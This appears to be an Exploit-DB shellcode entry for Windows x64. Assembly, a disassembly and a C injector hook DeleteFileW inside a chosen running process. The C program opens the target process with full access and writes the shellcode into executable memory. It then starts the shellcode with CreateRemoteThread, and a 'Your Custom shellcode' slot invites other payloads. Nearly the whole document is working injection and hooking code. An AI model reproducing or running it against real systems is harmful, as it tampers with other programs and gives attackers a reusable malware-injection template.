Windows/x64 - API Hooking Shellcode (117 bytes)

EDB-ID:

42992

CVE:

N/A




Date:

2017-10-16


/*

	# Title : Windows x64 API Hooking Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Size : 117 bytes
	# Date : 16/10/2017
	# Email : shifath12@gmail.com
	# Tested On : Windows 7 Ultimate x64



*/


/*

This Shellcode hooks DeteleFileW() API
Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to delete file from Recycle Bin

*/



/*


section .text
	global _start
_start:

xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PPEB
mov rax,[rax+24] ;PPEB->Ldr
mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink
mov rax,[rsi]
mov rsi,[rax]

mov rdi,[rsi+32] ;rdi=kernel32.dll base Address

;---------------------------------------------------------------
xor rsi,rsi
mov si,0x29f0
add rsi,rdi ;rsi=VirtualProtect()

;----------------------------------
;This Part is Important 

xor r12,r12
mov r12w,0xa2b0  ;0x0000a2b0 is Relative Address of DeleteFileW()
add r12,rdi ;r12=DeleteFileW()

;---------------------------------------------------
;Changing memory attribute
mov rcx,r12
push rdx

mov dl,9

pop r8
mov r8b,0x40
sub rsp,4
lea r14,[rsp]
mov r9,r14
call rsi

;--------------------------------------------------------
mov [r12],byte 0xe9
jmp shellcode

inj:
pop rdx
sub rdx,r12
sub rdx,5
mov [r12+1],rdx

xor rdx,rdx
mov dl,9
mov rcx,r12
mov r8d,dword [r14]
mov r9,r14

call rsi
add rsp,4
ret



shellcode:
call inj
;This is My own shellcode
db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3













*/



/*


apiint.obj:     file format pe-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 31 d2             	xor    %rdx,%rdx
   3:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
   8:	48 8b 40 18          	mov    0x18(%rax),%rax
   c:	48 8b 70 20          	mov    0x20(%rax),%rsi
  10:	48 8b 06             	mov    (%rsi),%rax
  13:	48 8b 30             	mov    (%rax),%rsi
  16:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  1a:	48 31 f6             	xor    %rsi,%rsi
  1d:	66 be f0 29          	mov    $0x29f0,%si
  21:	48 01 fe             	add    %rdi,%rsi
  24:	4d 31 e4             	xor    %r12,%r12
  27:	66 41 bc b0 a2       	mov    $0xa2b0,%r12w
  2c:	49 01 fc             	add    %rdi,%r12
  2f:	4c 89 e1             	mov    %r12,%rcx
  32:	52                   	push   %rdx
  33:	b2 09                	mov    $0x9,%dl
  35:	41 58                	pop    %r8
  37:	41 b0 40             	mov    $0x40,%r8b
  3a:	48 83 ec 04          	sub    $0x4,%rsp
  3e:	4c 8d 34 24          	lea    (%rsp),%r14
  42:	4d 89 f1             	mov    %r14,%r9
  45:	ff d6                	callq  *%rsi
  47:	41 c6 04 24 e9       	movb   $0xe9,(%r12)
  4c:	eb 22                	jmp    70 <shellcode>

000000000000004e <inj>:
  4e:	5a                   	pop    %rdx
  4f:	4c 29 e2             	sub    %r12,%rdx
  52:	48 83 ea 05          	sub    $0x5,%rdx
  56:	49 89 54 24 01       	mov    %rdx,0x1(%r12)
  5b:	48 31 d2             	xor    %rdx,%rdx
  5e:	b2 09                	mov    $0x9,%dl
  60:	4c 89 e1             	mov    %r12,%rcx
  63:	45 8b 06             	mov    (%r14),%r8d
  66:	4d 89 f1             	mov    %r14,%r9
  69:	ff d6                	callq  *%rsi
  6b:	48 83 c4 04          	add    $0x4,%rsp
  6f:	c3                   	retq   

0000000000000070 <shellcode>:
  70:	e8 d9 ff ff ff       	callq  4e <inj>
  75:	48 31 d2             	xor    %rdx,%rdx
  78:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  7d:	48 8b 40 18          	mov    0x18(%rax),%rax
  81:	48 8b 70 20          	mov    0x20(%rax),%rsi
  85:	48 8b 06             	mov    (%rsi),%rax
  88:	48 8b 30             	mov    (%rax),%rsi
  8b:	48 8b 7e 20          	mov    0x20(%rsi),%rdi
  8f:	68 90 65 01 0a       	pushq  $0xa016590
  94:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  99:	5b                   	pop    %rbx
  9a:	48 01 fb             	add    %rdi,%rbx
  9d:	52                   	push   %rdx
  9e:	52                   	push   %rdx
  9f:	48 b8 75 73 65 72 33 	movabs $0x642e323372657375,%rax
  a6:	32 2e 64 
  a9:	48 89 04 24          	mov    %rax,(%rsp)
  ad:	66 c7 44 24 08 6c 6c 	movw   $0x6c6c,0x8(%rsp)
  b4:	48 8d 0c 24          	lea    (%rsp),%rcx
  b8:	48 83 ec 58          	sub    $0x58,%rsp
  bc:	ff d3                	callq  *%rbx
  be:	68 b8 12 07 0a       	pushq  $0xa0712b8
  c3:	80 74 24 03 0a       	xorb   $0xa,0x3(%rsp)
  c8:	5b                   	pop    %rbx
  c9:	48 01 c3             	add    %rax,%rbx
  cc:	48 31 c9             	xor    %rcx,%rcx
  cf:	6a 10                	pushq  $0x10
  d1:	41 59                	pop    %r9
  d3:	51                   	push   %rcx
  d4:	51                   	push   %rcx
  d5:	48 ba 41 50 49 20 42 	movabs $0x636f6c4220495041,%rdx
  dc:	6c 6f 63 
  df:	48 89 14 24          	mov    %rdx,(%rsp)
  e3:	c7 44 24 08 6b 65 64 	movl   $0x2164656b,0x8(%rsp)
  ea:	21 
  eb:	48 8d 14 24          	lea    (%rsp),%rdx
  ef:	52                   	push   %rdx
  f0:	41 58                	pop    %r8
  f2:	48 83 ec 58          	sub    $0x58,%rsp
  f6:	48 83 ec 58          	sub    $0x58,%rsp
  fa:	ff d3                	callq  *%rbx
  fc:	90                   	nop
  fd:	48 31 d2             	xor    %rdx,%rdx
 100:	66 ba 28 01          	mov    $0x128,%dx
 104:	48 01 d4             	add    %rdx,%rsp
 107:	c3                   	retq   






*/






#include<stdio.h>
#include<windows.h>
#include<tlhelp32.h>
#include<string.h>

unsigned char shellcode[]=\

//Main Shellcode (Interceptor Shellcode)

"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x48\x31\xf6\x66\xbe\xf0\x29\x48\x01\xfe\x4d\x31\xe4\x66\x41\xbc\xb0\xa2\x49\x01\xfc\x4c\x89\xe1\x52\xb2\x09\x41\x58\x41\xb0\x40\x48\x83\xec\x04\x4c\x8d\x34\x24\x4d\x89\xf1\xff\xd6\x41\xc6\x04\x24\xe9\xeb\x22\x5a\x4c\x29\xe2\x48\x83\xea\x05\x49\x89\x54\x24\x01\x48\x31\xd2\xb2\x09\x4c\x89\xe1\x45\x8b\x06\x4d\x89\xf1\xff\xd6\x48\x83\xc4\x04\xc3\xe8\xd9\xff\xff\xff"

//Your Custom shellcode 

"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x68\x90\x65\x01\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xfb\x52\x52\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x68\xb8\x12\x07\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xc3\x48\x31\xc9\x6a\x10\x41\x59\x51\x51\x48\xba\x41\x50\x49\x20\x42\x6c\x6f\x63\x48\x89\x14\x24\xc7\x44\x24\x08\x6b\x65\x64\x21\x48\x8d\x14\x24\x52\x41\x58\x48\x83\xec\x58\x48\x83\xec\x58\xff\xd3\x90\x48\x31\xd2\x66\xba\x28\x01\x48\x01\xd4\xc3";



int main()
{
	HANDLE snap,proc,mem;
	DWORD len,l,pid;
	PROCESSENTRY32 ps;
	
	
	ps.dwSize=sizeof(ps);
	len=strlen(shellcode);
	
	
	snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	if(snap==INVALID_HANDLE_VALUE)
	{
		printf("CreateToolhelp32Snapshot() Failed");
		return 0;
	}
	
	
	if(!Process32First(snap,&ps))
	{
		printf("Process32First() Failed");
		return 0;
	}
	
	
	
	do
	{
		printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID);
	}while(Process32Next(snap,&ps));
	
	printf("\nEnter Process ID: ");
	scanf("%ld",&pid);
	
	
	proc=OpenProcess(PROCESS_ALL_ACCESS,0,pid);
	
	if(!proc)
	{
		printf("Failed to Open Process");
		return 0;
	}
	
	mem=VirtualAllocEx(proc,NULL,len,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
	if(!mem)
	{
		printf("Failed to allocate memory in process");
		return 0;
	}
	
	WriteProcessMemory(proc,mem,shellcode,len,NULL);
	VirtualProtectEx(proc,mem,len,PAGE_EXECUTE_READ,&l);
	
	CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)mem,NULL,0,0);
	CloseHandle(proc);
	
	return 0;
}